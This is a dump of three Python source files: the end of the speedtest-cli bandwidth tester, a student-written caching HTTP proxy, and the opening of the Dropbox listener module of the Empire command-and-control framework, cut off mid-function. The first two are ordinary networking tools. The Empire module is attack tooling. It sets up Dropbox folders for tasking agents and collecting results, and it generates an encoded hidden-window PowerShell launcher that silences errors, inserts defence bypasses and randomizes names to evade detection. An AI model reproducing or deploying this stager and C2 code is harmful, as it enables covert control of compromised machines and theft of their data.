pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://c.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
web_proxy.py | __author__ = 'Brent Berghmans 1334252'
import hashlib
import socket
import re
from threading import Thread
from threading import Lock
import Queue
import os
import sys
import time
from email.utils import formatdate
class HostReplacer:
def __init__(self, file = False):
self.mDict = dict()
if not file:
return
self.readFile(file)
def readFile(self, filename):
try:
with open(filename, 'r') as f:
for line in f:
line = line.strip()
if not line.startswith("#"):
splits = line.split(" ")
if len(splits) == 2:
self.mDict[splits[0]] = splits[1]
else:
print("Error, line contains 3 parameters: " + line + ", skipping this line.")
except:
print("Exception occurred with file.")
def replace(self, string):
if string in self.mDict:
return self.mDict[string]
else:
return string
def substringReplace(self, string):
for key, value in self.mDict.iteritems():
if key.lower() in string.lower() or key.lower() == string.lower():
replaced = string.lower().replace(key.lower(), value)
print string + " -> " + replaced
return replaced
return string
class HTTPCache:
def __init__(self):
self.mMD5 = hashlib.md5()
self.mDict = dict()
self.mValues = self.mDict.values()
def generateHash(self, string):
hash = self.generateUniqueHash(string)
self.mDict[string] = hash
self.mValues = self.mDict.values()
return hash
def generateUniqueHash(self, string):
hash = ""
self.mMD5.update(string)
hash = self.mMD5.hexdigest()
self.mMD5 = hashlib.md5()
baseHash = hash
return baseHash
def getHash(self, key):
if key in self.mDict:
return self.mDict[key]
elif key + "/" in self.mDict:
return self.mDict[key + "/"]
else:
return False
def containsKey(self, key):
return key in self.mDict or key + "/" in self.mDict
def containsValue(self, value):
return value in self.mValues
def remove(self, key):
if self.containsKey(key):
self.mDict.pop(key)
elif self.containsKey(key + "/"):
self.mDict.pop(key + "/")
def insert(self, key, value):
self.mDict[key] = value
self.mValues = self.mDict.values()
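#Disk-backed cache: responses are written under ./cache/ as <md5>.tmp files,
#keyed by an MD5 hash of "<ip><path>"; HTTPCache maps those keys to hashes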
class HTTPFileCache:
def __init__(self):
self.mCache = HTTPCache()
self.mLock = Lock()
def checkCacheDir(self):
if not os.path.isdir('./cache'):
os.makedirs('./cache')
def fileIsCached(self, url):
#Check if in our memory cache
self.mLock.acquire()
outcome = self.mCache.containsKey(url)
self.mLock.release()
#If not in our memory cache, check file system
if not outcome:
#print "Checking files;"
hash1 = self.mCache.generateUniqueHash(url)
hash2 = self.mCache.generateUniqueHash(url + "/")
print
if os.path.isfile("./cache/" + hash1 + ".tmp"):
#print "Hash1 exists"
self.mCache.insert(url, hash1)
outcome = True
elif os.path.isfile("./cache/" + hash2 + ".tmp"):
#print "Hash2 exists"
self.mCache.insert(url + "/", hash2)
outcome = True
return outcome
def getReadFilePointer(self, url):
#Get hashed name from cache
self.mLock.acquire()
hash = self.mCache.getHash(url)
self.mLock.release()
#open file pointer
f = open('cache/' + hash + ".tmp", 'rb')
return f
def getWriteFilePointer(self, url):
self.checkCacheDir()
hash = ""
#Check if file is cached
test = self.fileIsCached(url)
self.mLock.acquire()
#If cached, get the hash
if test:
hash = self.mCache.getHash(url)
#If not, generate a hash and put in cache
else:
hash = self.mCache.generateHash(url)
self.mLock.release()
#If the file already exists, delete it so a fresh cache entry is written
if os.path.exists('cache/' + str(hash) + ".tmp"):
os.remove('cache/' + str(hash) + ".tmp")
#Open write file pointer
f = open('cache/' + str(hash) + ".tmp", 'w+b')
return f
def removeFile(self, url):
test = self.fileIsCached(url)
self.mLock.acquire()
try:
if test:
hash = self.mCache.getHash(url)
if os.path.exists('cache/' + str(hash) + '.tmp'):
os.remove('cache/' + str(hash) + '.tmp')
self.mCache.remove(url)
except:
print "Error occured when deleting file."
self.mLock.release()
#################
# Entry #
# Point #
#################
class ClientHandler:
def __init__(self, clientSocket, clientAddress, fileCache, hostReplacer):
self.mSocket = clientSocket
self.mAddress = clientAddress
self.mRequestQueue = Queue.Queue()
self.mThread = Thread(target=self.doInBackground)
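#Regexes that capture one complete HTTP request (request line plus headers,
#terminated by a blank line) and an HTTP/1.1 response status line with headers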
self.mGetRequestRe = re.compile("^(.|\r\n)*?(GET (.)* HTTP\\/1\\.(1|0)\r\n(.|\r\n)+?\r\n\r\n)")
self.mOtherRequestRe = re.compile("^(.|\r\n)*?([a-zA-Z]+? (.)* HTTP\\/1\\.(1|0)\r\n(.|\r\n)+?\r\n\r\n)")
self.mResponseRe = re.compile("(^(HTTP\\/1.1)\\s([0-9]{3})\\s.*\r\n(.+?:.+?\r\n)*\r\n)")
self.mShouldStop = False
self.mCache = fileCache
self.mRedirects = hostReplacer
self.mDebug = False
def runLoop(self):
self.mBuffer = ''
try:
while not self.mShouldStop:
self.mSocket.settimeout(30)
data = self.mSocket.recv(1024)
if not data:
break
self.mBuffer = self.mBuffer + data
#Check if the buffer contains requests
self.parseReceive()
#Send requested files if we have them
self.sendFile()
except socket.timeout:
if len(self.mBuffer.strip()) != 0:
self.sendBadRequest()
else:
self.sendTimeout()
except socket.error:
try:
self.mSocket.close()
#ignore errors while closing; "pass" is Python's no-op
except socket.error:
pass
except:
pass
def parseReceive(self):
self.printDebug("In parseReceive")
while True:
#Check if the regex matches
matches = self.mOtherRequestRe.match(self.mBuffer)
if not matches:
break
#This one is the part of the string we need
match = matches.groups()[1]
if not match:
break
else:
self.printDebug("Found a match")
#Make a request based on string
request = HttpRequest(match)
#Edit headers
request.setHeader("User-Agent", "1.1 Brent Proxy")
request.setHeader("Via", "1.1 Brent Proxy")
request.setHeader("X-Forwarded-For", self.mAddress[0])
#If request is valid, add it to list
if not request.mInvalid:
#Try to replace host and request url with hosts file
host = self.mRedirects.substringReplace(request.getHeader("Host"))
url = self.mRedirects.substringReplace(request.getUrl())
request.setHeader("Host", host)
request.setUrl(url)
self.mRequestQueue.put(request)
#Remove this match from buffer, support for more than one request per socket (disabled for safety)
self.mBuffer = self.mBuffer[len(match):]
def sendFile(self):
self.printDebug("In sendFile")
#If we don't need to send files, return
if self.mRequestQueue.empty():
return
#Get some values
request = self.mRequestQueue.get()
path = request.getUrl()
host = request.getHeader("Host")
try:
#Get ip of host
ip = socket.gethostbyname(host)
#Check if file is cached
if self.mCache.fileIsCached(str(ip) + str(path)):
#If so, try to send from cached file (can fail because of deletion of file or busy file pointers)
try:
file = self.mCache.getReadFilePointer(str(ip) + str(path))
self.sendFromCache(request, file)
#if it fails, send from host
except:
print "Exception when sending cached file."
self.sendFromHost(request, ip, host, path)
#If not cached, send from host
else:
self.sendFromHost(request, ip, host, path)
except socket.error as msg:
print msg
self.sendBadRequest()
print "Exception in send."
self.mSocket.close()
self.mShouldStop = True
def sendFromCache(self, request, file):
print "CACHE: " + request.getUrl()
#Init
bufferData = file.read(5024)
self.printDebug(bufferData)
self.mSocket.send(bufferData)
#Keep sending as long as we have data
while bufferData:
bufferData = file.read(5024)
if not bufferData:
break
self.printDebug(bufferData)
self.mSocket.send(bufferData)
file.close()
def sendFromHost(self, request, ip, host, path):
print "HOST: " + request.getUrl()
#Make connection with host
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, 80))
#Edit request header
request.setHeader("Connection", "close")
#We only need to cache get requests
shouldCache = (request.getMethod().lower() == "get")
#Send request to host
query = request.getRequestQuery()
sock.send(query)
#If we need to cache, try to get a file write pointer
file = ""
if shouldCache:
try:
file = self.mCache.getWriteFilePointer(str(ip) + str(path))
except:
shouldCache = False
header = ""
headerFound = False
while True:
#Get data from host
data = sock.recv(5024)
if not data:
break
#Originally planned to rewrite the header here, but that caused problems with chunked data, so it was left out
if not headerFound:
header = header + data
matches = self.mResponseRe.match(header)
if matches:
headerCopy = header
headerString = matches.groups()[0]
leftover = header[len(headerString):].strip()
header = HttpResponse(headerString)
headerFound = True
self.mSocket.send(headerCopy)
if shouldCache:
file.write(headerCopy)
continue
#Send to socket
self.mSocket.send(data)
#And write to file if we can/must
if shouldCache:
file.write(data)
if shouldCache:
file.close()
try:
if headerFound and header.getResponseCode() != 200 and shouldCache:
self.mCache.removeFile(str(ip) + str(path))
except:
pass
def sendNotFound(self):
self.mSocket.send("HTTP/1.1 404 Not Found\r\n\r\n<html><body>404 File not found.</body></html>")
def sendBadRequest(self):
try:
self.mSocket.send("HTTP/1.1 400 Bad Request\r\n\r\n<html><body>400 Bad Request.</body></html>")
self.mSocket.close()
self.mShouldStop = True
except:
print "Exception occurred when sending 400 Bad request."
def sendTimeout(self):
try:
self.mSocket.send("HTTP/1.1 408 Request Timeout\r\n\r\n<html><body>408 Request Timeout.</body></html>")
self.mSocket.close()
self.mShouldStop = True
except:
print "Exception occurred when sending 408 Request Timeout."
def doInBackground(self):
stop = self.runLoop()
self.mSocket.close()
def execute(self):
self.mThread.start()
def join(self):
self.mThread.join()
def printDebug(self, string):
if self.mDebug:
print string
class HttpBase:
def __init__(self):
self.mHeaders = dict()
self.mVersion = ""
def hasHeader(self, key):
return key.lower() in self.mHeaders
def getHeader(self, key):
return self.mHeaders[key.lower()]
def setHeader(self, key, value):
self.mHeaders[key.lower()] = value
def setVersion(self, version):
self.mVersion = version
def getVersion(self):
return self.mVersion
def parseHeaderLine(self, string):
#We should be able to split on ":"
if re.match(".*:.*", string):
headerSplit = re.split(":", string)
left = headerSplit[0].strip()
right = ""
#There might be more than one ":", just concatenate
for i in range(1, len(headerSplit)):
if i == 1:
right = headerSplit[i]
else:
right = right + ":" + headerSplit[i]
right = right.strip()
self.setHeader(left, right)
def getHeadersQuery(self):
keys = self.mHeaders.keys()
values = self.mHeaders.values()
toRet = ""
for i in range(0, len(keys)):
if i == len(keys) - 1:
toRet = toRet + keys[i] + ": " + values[i]
else:
toRet = toRet + keys[i] + ": " + values[i] + "\r\n"
return toRet
class HttpResponse(HttpBase):
def __init__(self, text = False):
HttpBase.__init__(self)
self.mBase = HttpBase()
self.mResponseCode = -1
self.mResponseName = ""
self.mInvalid = True
if not text:
return
self.parse(text)
def getResponse(self):
return (self.mResponseCode, self.mResponseName)
def setResponse(self, response):
self.setResponseCode(response[0])
self.setResponseName(str(response[1]))
def getResponseName(self):
return self.mResponseName
def setResponseName(self, responseName):
self.mResponseName = str(responseName)
def getResponseCode(self):
return self.mResponseCode
def setResponseCode(self, code):
self.mResponseCode = int(code)
def parse(self, response):
#Split on \r\n
splits = re.split("\r\n", response)
httpFound = False
for split in splits:
#If we have not found the first line
if not httpFound:
httpFound = self.parseFirstLine(split)
#If we have found the first line
else:
self.parseHeaderLine(split)
self.mInvalid = not httpFound
def parseFirstLine(self, line):
#Check if the line matches the first line of an HTTP request
if re.match("HTTP\\/1\\.(0|1) [0-9]{1,3} .+", line):
versNo = line[5:8].strip()
statusCode = line[9:12].strip()
statusName = line[13:].strip()
self.setVersion(versNo.strip())
self.mResponseCode = int(statusCode)
self.mResponseName = statusName.strip()
return True
else:
return False
def getFirstLineQuery(self):
toRet = ""
toRet = toRet + "HTTP/" + self.getVersion() + " " + str(self.mResponseCode) + " " + str(self.mResponseName)
return toRet
def getResponseQuery(self):
toRet = self.getFirstLineQuery() + "\r\n"
toRet = toRet + self.getHeadersQuery() + "\r\n\r\n"
return toRet
class HttpRequest(HttpBase):
def __init__(self, text = False):
HttpBase.__init__(self)
self.mBase = HttpBase()
self.mUrl = ""
self.mMethod = ""
self.mInvalid = True
if not text:
return
self.parse(text)
def getUrl(self):
return self.mUrl
def setUrl(self, url):
self.mUrl = url
def getMethod(self):
return self.mMethod
def setMethod(self, method):
self.mMethod = method
def parse(self, text):
#Split on \r\n
splits = re.split("\r\n", text)
httpFound = False
for split in splits:
#If we have not found the first line
if not httpFound:
httpFound = self.parseFirstLine(split)
#If we have found the first line
else:
self.parseHeaderLine(split)
self.mInvalid = not httpFound
def parseFirstLine(self, line):
#Check if the line matches the first line of an HTTP request
result = re.match("([a-zA-Z]+) .* HTTP\\/1\\.(1|0)", line)
if result:
self.mMethod = result.group(1)
url = line[len(self.mMethod) + 1:].strip()
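#the trailing 9 characters are " HTTP/1.x"; split them off the URL
#and keep just the version digits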
versNo = url[len(url) - 9:]
url = url[0: len(url) - len(versNo)].strip()
versNo = versNo[6:].strip()
self.setUrl(url)
self.setVersion(versNo)
return True
else:
return False
def getFirstLineQuery(self):
toRet = ""
toRet = toRet + self.getMethod() + " " + self.getUrl() + " HTTP/" + self.getVersion()
return toRet
def getRequestQuery(self):
toRet = self.getFirstLineQuery() + "\r\n"
toRet = toRet + self.getHeadersQuery()
toRet = toRet + "\r\n\r\n"
return toRet
class HttpServer:
def __init__(self, port, file = False):
if not file:
print "Starting server on port " + str(port)
else:
print "Starting server on port " + str(port) + " with redirect file: " + str(file)
self.mInvalid = False
self.mPort = port
self.mCache = HTTPFileCache()
self.mRedirects = HostReplacer(file)
def open(self):
self.mSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mSocket.bind(("localhost", self.mPort))
self.mSocket.listen(5)
def close(self):
self.mSocket.close()
def runServer(self):
self.open()
counter = 0
while True:
clientSocket, clientAddress = self.mSocket.accept()
#Make new handler
clientHandler = ClientHandler(clientSocket, clientAddress, self.mCache, self.mRedirects)
#Start it
clientHandler.execute()
counter = counter + 1
#print "Sockets opened: " + str(counter)
if len(sys.argv) == 3:
if sys.argv[1] == "-p":
port = int(sys.argv[2])
server = HttpServer(port)
server.runServer()
else:
print "Invalid params, aborting."
elif len(sys.argv) == 5:
if sys.argv[1] == "-p" and sys.argv[3] == "-r":
server = HttpServer(int(sys.argv[2]), str(sys.argv[4]))
server.runServer()
elif sys.argv[1] == "-r" and sys.argv[3] == "-p":
server = HttpServer(int(sys.argv[4]), str(sys.argv[2]))
server.runServer()
else:
print "Invalid params, aborting."
else:
print "Invalid params, aborting"
|
dbx.py | from __future__ import print_function
import base64
import copy
import json
import os
import time
import dropbox
from builtins import object
from builtins import str
from typing import List
from pydispatch import dispatcher
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import templating
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Dropbox',
'Author': ['@harmj0y'],
'Description': ('Starts a Dropbox listener.'),
'Category' : ('third_party'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'dropbox'
},
'APIToken' : {
'Description' : 'Authorization token for Dropbox API communication.',
'Required' : True,
'Value' : ''
},
'PollInterval' : {
'Description' : 'Polling interval (in seconds) to communicate with the Dropbox Server.',
'Required' : True,
'Value' : '5'
},
'BaseFolder' : {
'Description' : 'The base Dropbox folder to use for comms.',
'Required' : True,
'Value' : '/Empire/'
},
'StagingFolder' : {
'Description' : 'The nested Dropbox staging folder.',
'Required' : True,
'Value' : '/staging/'
},
'TaskingsFolder' : {
'Description' : 'The nested Dropbox taskings folder.',
'Required' : True,
'Value' : '/taskings/'
},
'ResultsFolder' : {
'Description' : 'The nested Dropbox results folder.',
'Required' : True,
'Value' : '/results/'
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 60
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 10
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackURL' : {
'Description' : 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/dbx generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
# host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
resultsFolder = "/%s/%s" % (baseFolder, listenerOptions['ResultsFolder']['Value'].strip('/'))
if language.startswith('po'):
# PowerShell
# replace with stager = '' for troubleshooting
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
for bypass in bypasses:
stager += bypass
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
